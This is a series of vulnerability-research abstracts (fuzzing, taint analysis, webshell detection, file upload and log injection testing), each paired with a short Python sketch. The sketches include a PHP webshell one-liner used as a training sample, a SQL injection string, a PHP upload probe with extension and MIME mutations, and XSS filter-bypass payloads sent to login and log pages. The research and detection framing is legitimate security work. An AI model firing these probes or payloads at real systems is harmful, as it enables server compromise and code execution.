Buffer overflow is one of the most common and harmful classes of vulnerabilities in computer software. This paper analyzes and summarizes the general methods and process of testing software for buffer overflow vulnerabilities, and studies techniques for locating the key data structures involved in such vulnerabilities. By constructing special filler data and designing a location algorithm, the paper presents a new localization technique based on block localization. The technique can locate the address of the key data structure of a buffer overflow vulnerability quickly and accurately, effectively assisting buffer overflow vulnerability testing in software security.
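As a hypothetical illustration of the filler-data idea (not the paper's block localization algorithm), the Python sketch below builds a non-repeating filler pattern so that the value observed in the overwritten key structure at crash time directly reveals its offset in the input; the pattern generator, helper names, and the simulated crash value are assumptions.

```python
# Illustrative sketch: locate the offset of a key data structure (e.g., a saved
# return address) inside an overflowed buffer by filling the input with a
# non-repeating marker pattern and looking up the value seen at the crash site.

import itertools
import struct

def make_pattern(length: int) -> bytes:
    """Build a non-repeating filler pattern out of upper/lower/digit triples."""
    triples = itertools.product(
        b"ABCDEFGHIJKLMNOPQRSTUVWXYZ",
        b"abcdefghijklmnopqrstuvwxyz",
        b"0123456789",
    )
    out = bytearray()
    for a, b, c in triples:
        out += bytes((a, b, c))
        if len(out) >= length:
            break
    return bytes(out[:length])

def locate_offset(pattern: bytes, crash_value: int, word_size: int = 4) -> int:
    """Return the offset in the pattern of the value that overwrote the key structure."""
    needle = struct.pack("<I" if word_size == 4 else "<Q", crash_value)
    return pattern.find(needle)

if __name__ == "__main__":
    filler = make_pattern(1024)                               # data fed to the vulnerable input
    faulting_eip = struct.unpack("<I", filler[112:116])[0]    # simulated crash-time register value
    print("key structure offset:", locate_offset(filler, faulting_eip))
```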
Directed grey-box fuzzing (DGF) aims to discover vulnerabilities in specific code areas efficiently. The distance metric, which measures seed quality in DGF, is a crucial factor affecting fuzzing performance. Although distance metrics are widely applied in existing DGF frameworks, it remains unclear how different distance metrics guide the fuzzing process and affect the fuzzing results in practice. In this paper, we conduct the first empirical study of how different distance metrics perform in guiding DGF. Specifically, we systematically discuss different distance metrics in terms of calculation method and granularity. Then, we implement these distance metrics on top of AFLGo. On this basis, we conduct comprehensive experiments to evaluate their performance on benchmarks widely used in existing DGF-related work. The experimental results yield the following insights. First, the differences among distance metrics with varying calculation methods and granularities are not significant. Second, the distance metrics may not be effective in describing the difficulty of triggering the target vulnerability. In addition, by scrutinizing the quality of test cases, our study highlights the inherent limitation of existing mutation strategies in generating high-quality test cases, calling for effective mutation strategies designed for directed fuzzing. We open-source the implementation code and experiment dataset to facilitate future research on DGF.
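To make the notions of calculation method and granularity concrete, the following Python sketch computes a simplified AFLGo-style seed distance: a basic block's distance is the harmonic mean of its shortest-path distances to the targets, and a seed's distance is the arithmetic mean over the blocks its trace exercised. The toy CFG, trace, and helper names are illustrative assumptions, not AFLGo's actual implementation.

```python
# Simplified sketch of a directed-fuzzing distance metric over a toy CFG.

from collections import deque

def shortest_paths(cfg: dict, src: str) -> dict:
    """BFS shortest-path lengths from src over a directed adjacency dict."""
    dist = {src: 0}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        for succ in cfg.get(node, []):
            if succ not in dist:
                dist[succ] = dist[node] + 1
                queue.append(succ)
    return dist

def block_distance(cfg: dict, block: str, targets: set):
    """Harmonic mean of the block's shortest distances to the reachable targets."""
    if block in targets:
        return 0.0
    dist = shortest_paths(cfg, block)
    reachable = [dist[t] for t in targets if t in dist]
    if not reachable:
        return None                      # no target reachable from this block
    return len(reachable) / sum(1.0 / d for d in reachable)

def seed_distance(cfg: dict, trace: list, targets: set) -> float:
    """Arithmetic mean of block distances along one execution trace."""
    dists = [block_distance(cfg, b, targets) for b in trace]
    dists = [d for d in dists if d is not None]
    return sum(dists) / len(dists) if dists else float("inf")

if __name__ == "__main__":
    cfg = {"a": ["b", "c"], "b": ["d"], "c": ["d"], "d": ["t"]}      # toy CFG
    print(seed_distance(cfg, trace=["a", "b", "d"], targets={"t"}))  # 2.0
```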
Vulnerabilities have become one of the most important factors threatening network security, and vulnerability evaluation helps judge their exploitability. However, the Common Vulnerability Scoring System (CVSS) is too coarse-grained and does not consider the different weights of its factors. This paper selects the specific factors related to vulnerability exploitability and uses hierarchical analysis, information entropy, and fuzzy comprehensive evaluation to evaluate vulnerability exploitability, which is shown to be more precise than the CVSS evaluation method.
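A minimal sketch of the weighting-and-evaluation step, assuming entropy-derived factor weights combined with a weighted-average fuzzy composition; the factor scores and membership values below are made-up examples rather than the paper's data, and the hierarchical-analysis weights are omitted for brevity.

```python
# Illustrative entropy-weight plus fuzzy-comprehensive-evaluation calculation.

import math

def entropy_weights(matrix):
    """Entropy weight per column of a samples-by-factors score matrix."""
    n = len(matrix)
    cols = list(zip(*matrix))
    entropies = []
    for col in cols:
        total = sum(col)
        probs = [v / total for v in col if v > 0]
        entropies.append(-sum(p * math.log(p) for p in probs) / math.log(n))
    divergence = [1 - e for e in entropies]
    return [d / sum(divergence) for d in divergence]

def fuzzy_evaluate(weights, membership):
    """Weighted-average fuzzy composition: B = W * R."""
    grades = len(membership[0])
    return [sum(w * row[g] for w, row in zip(weights, membership))
            for g in range(grades)]

if __name__ == "__main__":
    # Rows: sample vulnerabilities; columns: exploitability factors
    # (e.g., access vector, attack complexity, authentication, exploit maturity).
    scores = [[0.9, 0.7, 0.5, 0.8],
              [0.6, 0.9, 0.7, 0.4],
              [0.3, 0.5, 0.9, 0.6]]
    w = entropy_weights(scores)
    # Membership of each factor in the grades (low / medium / high exploitability).
    R = [[0.1, 0.3, 0.6],
         [0.2, 0.5, 0.3],
         [0.5, 0.4, 0.1],
         [0.2, 0.3, 0.5]]
    print("weights:", w)
    print("evaluation vector:", fuzzy_evaluate(w, R))
```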
Taint analysis is a key technique for analyzing the robustness of programs and for vulnerability mining. By marking data that are sensitive or untrusted, one can observe the flow of the tainted data during program execution and determine whether the marked data affect key nodes of the program. According to the implementation mechanism, taint analysis can be divided into static taint analysis and dynamic taint analysis. As an auxiliary technique, it can be combined with mainstream vulnerability mining techniques such as fuzzing and symbolic execution, playing an important role in test case construction and path feasibility analysis. This article first introduces the basic concepts of dynamic taint analysis. It then focuses on the processes of dynamic taint marking, propagation, and detection, and summarizes the main defects of taint analysis as well as the application status of dynamic taint analysis. Finally, it compares current mainstream taint analysis tools and explores future trends in taint analysis techniques.
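A minimal sketch of the marking, propagation, and detection stages, assuming a toy string-based taint wrapper rather than an instruction-level engine; the source and sink functions are hypothetical.

```python
# Toy dynamic taint tracking: values from an untrusted source are marked,
# taint propagates through string operations, and reaching a sensitive sink
# raises an alert.

class Tainted(str):
    """String subclass that carries a taint flag through concatenation."""
    def __add__(self, other):
        return Tainted(str.__add__(self, str(other)))
    def __radd__(self, other):
        return Tainted(str(other) + str(self))

def source(user_input: str) -> Tainted:
    """Taint marking: everything from the untrusted source is tainted."""
    return Tainted(user_input)

def sink(query: str) -> None:
    """Taint detection: refuse to use tainted data at a sensitive operation."""
    if isinstance(query, Tainted):
        raise RuntimeError("tainted data reached SQL sink: " + str(query))
    print("executing:", query)

if __name__ == "__main__":
    name = source("alice' OR '1'='1")                                # taint introduced
    query = "SELECT * FROM users WHERE name = '" + name + "'"        # taint propagates
    try:
        sink(query)                                                  # taint detected at the sink
    except RuntimeError as alert:
        print("ALERT:", alert)
```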
A webshell is a malicious backdoor that allows remote access to and control of a web server by executing arbitrary commands. The wide use of obfuscation and encryption technologies has greatly increased the difficulty of webshell detection. To this end, we propose a novel webshell detection model leveraging grammatical features extracted from PHP code. The key idea is to combine the executable-code characteristics of the PHP code with static text features for webshell classification. To verify the proposed model, we construct a cleaned webshell dataset consisting of 2,917 samples from 17 webshell collection projects and conduct extensive experiments. We design three sets of controlled experiments, the results of which show that the accuracy of the three algorithms exceeds 99.40% (99.66% at best), the recall rate improves by at least 1.8% and by as much as 6.75%, and the F1 score increases by 2.02% on average. This not only confirms the effectiveness of grammatical features in webshell detection but also shows that our system significantly outperforms several state-of-the-art rivals in terms of detection accuracy and recall rate.
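As a rough illustration (not the paper's model), the sketch below combines a few hand-crafted code features of PHP sources with character n-gram text features and feeds them to an off-the-shelf classifier; the dangerous-function list, feature set, and tiny inline samples are assumptions standing in for a real labelled corpus.

```python
# Combine simple "grammatical"/code features with text features for webshell
# classification, using scikit-learn as an example learning backend.

import math, re
from scipy.sparse import hstack, csr_matrix
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import RandomForestClassifier

DANGEROUS = ("eval", "assert", "system", "base64_decode", "gzinflate", "preg_replace")

def code_features(src: str):
    """Hand-crafted features approximating executable-code characteristics."""
    counts = [len(re.findall(rf"\b{f}\s*\(", src)) for f in DANGEROUS]
    probs = [src.count(c) / len(src) for c in set(src)]
    entropy = -sum(p * math.log2(p) for p in probs)      # obfuscation tends to raise entropy
    return counts + [entropy, len(src)]

samples = [
    "<?php eval(base64_decode($_POST['x'])); ?>",        # webshell-like sample
    "<?php echo htmlspecialchars($_GET['name']); ?>",    # benign-looking sample
]
labels = [1, 0]

tfidf = TfidfVectorizer(analyzer="char", ngram_range=(2, 4))
text_matrix = tfidf.fit_transform(samples)
code_matrix = csr_matrix([code_features(s) for s in samples])

clf = RandomForestClassifier(n_estimators=50, random_state=0)
clf.fit(hstack([text_matrix, code_matrix]), labels)
print(clf.predict(hstack([tfidf.transform(samples), code_matrix])))
```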
Unrestricted file upload (UFU) vulnerabilities, especially unrestricted executable file upload (UEFU) vulnerabilities, pose severe security risks to web servers. For instance, attackers can leverage such vulnerabilities to execute arbitrary code and gain control of an entire web server. Therefore, it is important to develop effective and efficient methods to detect UFU and UEFU vulnerabilities. Toward this end, most state-of-the-art methods are based on dynamic testing. Nevertheless, they still have two critical limitations: 1) they heavily rely on manual effort, which is error-prone and adapts poorly, and 2) they seldom leverage effective information to guide the testing, generating a large number of invalid test cases. These limitations severely hinder the performance of UFU vulnerability detection. In this paper, we propose URadar, an adaptive dynamic-testing-based method for detecting UFU and UEFU vulnerabilities. URadar has three core designs, namely file upload interface identification, file type restriction inference, and invalid mutation combination filtration, which effectively address the two limitations of existing methods. To evaluate the performance of URadar, we conduct extensive experiments and compare URadar with state-of-the-art methods (e.g., FUSE, RIPS). In testing 18 web applications, URadar discovers 26 UEFU vulnerabilities, of which 8 are new and 6 have been assigned new CVE/CNNVD IDs. By contrast, FUSE and RIPS find 14 and 2 UEFU vulnerabilities, respectively. To discover the same number of UFU vulnerabilities, FUSE needs to send 73,261 request packets with a time cost of 2,791.1 s on average, 23.43 and 20.53 times those of URadar, respectively. These results demonstrate that URadar significantly outperforms the state-of-the-art methods. In addition, we have open-sourced URadar to facilitate future research on UFU vulnerability detection.
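A hedged sketch of the restriction-inference and invalid-combination-filtration idea, assuming a hypothetical upload endpoint, form field name, and rejection messages; it is not URadar's implementation.

```python
# Mutation-based upload probing: combine extension and MIME-type mutations,
# infer which components the server filters, and skip combinations that
# contain an already-rejected component.

import itertools
import requests

UPLOAD_URL = "http://target.example/upload.php"       # hypothetical upload interface
EXTENSIONS = ["php", "pHp", "php5", "phtml", "php.jpg"]
MIME_TYPES = ["image/jpeg", "image/png", "application/x-php"]
PAYLOAD = b"<?php echo 'uefu-probe'; ?>"

def upload(ext: str, mime: str) -> requests.Response:
    files = {"file": (f"probe.{ext}", PAYLOAD, mime)}  # form field name is a guess
    return requests.post(UPLOAD_URL, files=files, timeout=10)

def infer_and_test():
    rejected_exts, rejected_mimes = set(), set()
    for ext, mime in itertools.product(EXTENSIONS, MIME_TYPES):
        if ext in rejected_exts or mime in rejected_mimes:
            continue                                   # filter invalid mutation combinations
        resp = upload(ext, mime)
        body = resp.text.lower()
        if "invalid extension" in body:                # hypothetical filter messages
            rejected_exts.add(ext)
        elif "invalid type" in body:
            rejected_mimes.add(mime)
        elif resp.ok:
            print("possible unrestricted upload:", ext, mime)

if __name__ == "__main__":
    infer_and_test()
```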
Modern web services widely provide RESTful APIs for clients to access their functionality programmatically. Fuzzing is an emerging technique for ensuring the reliability of RESTful APIs. However, existing RESTful API fuzzers repeatedly generate invalid requests because they are unaware of the errors in invalid tested requests and lack effective strategies for generating legal values for the incorrect parameters. These limitations severely hinder fuzzing performance. In this paper, we propose DynER, a new test case generation method guided by dynamic error responses during fuzzing. DynER designs two parameter-value generation strategies that purposefully revise the incorrect parameters of invalid tested requests to generate new test requests: prompting a Large Language Model (LLM) to understand the semantic information in error responses, and actively accessing API-related resources. We apply DynER to the state-of-the-art fuzzer RESTler and implement DynER-RESTler. DynER-RESTler outperforms foREST on two real-world RESTful services, WordPress and GitLab, with 41.21% and 26.33% higher average pass rates for test requests and 12.50% and 22.80% higher average numbers of unique request types successfully tested, respectively. The experimental results demonstrate that DynER significantly improves the effectiveness of test cases and the fuzzing performance. Additionally, DynER-RESTler finds three new bugs.
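A hedged sketch of error-response-guided parameter revision under assumed API paths and error formats; the llm_suggest stub stands in for the LLM-based strategy and existing_resource_value for the active resource-access strategy, neither of which reproduces DynER itself.

```python
# Revise the offending parameter of an invalid request based on the error
# response, then resend the corrected request.

import re
import requests

BASE = "http://api.example"            # hypothetical RESTful service

def llm_suggest(param: str, error_msg: str) -> str:
    """Stub for the LLM strategy: infer a plausible value from the error text."""
    match = re.search(r"expected (\w+)", error_msg)
    return "1" if match and match.group(1) == "integer" else "default"

def existing_resource_value(param: str):
    """Active-access strategy: fetch a live resource and reuse one of its IDs."""
    resp = requests.get(f"{BASE}/{param.removesuffix('_id')}s", timeout=10)
    items = resp.json() if resp.ok else []
    return items[0]["id"] if items else None

def send_with_revision(path: str, params: dict) -> requests.Response:
    resp = requests.post(f"{BASE}{path}", json=params, timeout=10)
    if resp.status_code == 400:
        error = resp.json().get("message", "")
        bad = re.search(r"parameter '(\w+)'", error)   # hypothetical error format
        if bad:
            name = bad.group(1)
            params[name] = existing_resource_value(name) or llm_suggest(name, error)
            resp = requests.post(f"{BASE}{path}", json=params, timeout=10)
    return resp

if __name__ == "__main__":
    print(send_with_revision("/posts", {"title": "t", "author_id": "oops"}).status_code)
```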
In web application second-order vulnerabilities, malicious code is first injected into the persistent data stores of the web server and then executed during later sensitive operations, causing severe impact. Nevertheless, the dynamic features, the complex data propagation, and the inter-state dependencies bring many challenges to discovering such vulnerabilities. To address these challenges, we propose DISOV, a method based on a web application property graph (WAPG) for discovering second-order vulnerabilities. Specifically, DISOV first constructs the WAPG to represent the data propagation and inter-state dependencies of the web application, which can then be leveraged to find potential second-order vulnerability paths. It then uses fuzz testing to verify the potential vulnerability paths. To verify the effectiveness of DISOV, we tested it on 13 popular real-world web applications and compared it with Black Widow, the state-of-the-art web vulnerability scanner. DISOV discovered 43 second-order vulnerabilities, including 23 second-order XSS vulnerabilities, 3 second-order SQL injection vulnerabilities, and 17 second-order RCE vulnerabilities, whereas Black Widow discovered only 18 second-order XSS vulnerabilities and no second-order SQL injection or RCE vulnerabilities. In addition, DISOV found 12 zero-day second-order vulnerabilities, demonstrating its effectiveness in practice.
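As an illustration of the property-graph idea (not DISOV's WAPG construction), the sketch below models inputs, persistent stores, and sinks as graph nodes and enumerates input-to-sink paths that pass through a store as second-order candidates; node names and attributes are hypothetical, and a real system would derive them from crawling and instrumenting the application.

```python
# Model second-order data flows as a small directed property graph and
# enumerate candidate input -> store -> sink paths for later fuzz verification.

import networkx as nx

g = nx.DiGraph()
# States/operations of a toy application.
g.add_node("comment_form", kind="input")
g.add_node("db:comments", kind="store")
g.add_node("admin_view", kind="sink", sink_type="xss")

# Edges model data propagation and inter-state dependencies.
g.add_edge("comment_form", "db:comments", action="write")
g.add_edge("db:comments", "admin_view", action="read")

def second_order_candidates(graph):
    """Yield input-to-sink paths that traverse a persistent store."""
    inputs = [n for n, d in graph.nodes(data=True) if d.get("kind") == "input"]
    sinks = [n for n, d in graph.nodes(data=True) if d.get("kind") == "sink"]
    for src in inputs:
        for dst in sinks:
            for path in nx.all_simple_paths(graph, src, dst):
                if any(graph.nodes[n].get("kind") == "store" for n in path[1:-1]):
                    yield path            # to be confirmed later by fuzz testing

if __name__ == "__main__":
    for candidate in second_order_candidates(g):
        print("candidate second-order path:", " -> ".join(candidate))
```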
Web applications widely use logging functionality, but improper handling can introduce serious security threats. An attacker can write malicious data to the web application logs and then trigger its execution by accessing the view-logs interface, resulting in a web application log injection vulnerability. However, detecting this type of vulnerability requires automatically discovering log-injectable interfaces and view-logs interfaces, which is difficult. In addition, bypassing application-specific input-filtering checks to write an effective payload to the log is also challenging. This paper proposes LogInjector, an efficient web application log injection vulnerability detection method. First, it obtains the log storage form and location and then finds log-injectable interfaces through an extended dynamic crawler. Second, it automatically identifies the web application's view-logs interfaces. Finally, LogInjector uses a dynamic testing approach based on feedback-guided mutation to detect web application log injection vulnerabilities. To verify the effectiveness of LogInjector, we test it on 14 popular real-world web applications and compare it with Black Widow, the state-of-the-art web vulnerability scanner. LogInjector detects 16 web application log injection vulnerabilities, including 6 zero-day vulnerabilities, while Black Widow detects only three, demonstrating the effectiveness of LogInjector in practice.
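A minimal sketch of the write-then-read probing loop under assumed URLs, parameters, and payload mutations; the real method discovers both interfaces automatically and mutates payloads based on filtering feedback rather than iterating a fixed list.

```python
# Probe for log injection: write a marked payload via a log-injectable
# interface, then check whether it survives unencoded in the view-logs page.

import requests

LOGIN_URL = "http://target.example/login.php"            # candidate log-injectable interface
VIEW_LOGS_URL = "http://target.example/admin/logs.php"   # candidate view-logs interface
MARKER = "loginjector-probe-7f3a"

PAYLOADS = [                                             # mutations tried on filtering feedback
    f"<script>/*{MARKER}*/</script>",
    f"<scr<script>ipt>/*{MARKER}*/</scr</script>ipt>",
    f"<img src=x onerror=alert('{MARKER}')>",
]

def probe(session: requests.Session) -> None:
    for payload in PAYLOADS:
        # Write phase: trigger a log entry containing the payload (failed login).
        session.post(LOGIN_URL, data={"username": payload, "password": "x"}, timeout=10)
        # Read phase: check whether the payload reaches the view-logs page intact.
        logs = session.get(VIEW_LOGS_URL, timeout=10).text
        if payload in logs:
            print("potential log injection with payload:", payload)
            return
        if MARKER in logs:
            print("payload logged but filtered; trying next mutation")

if __name__ == "__main__":
    probe(requests.Session())
```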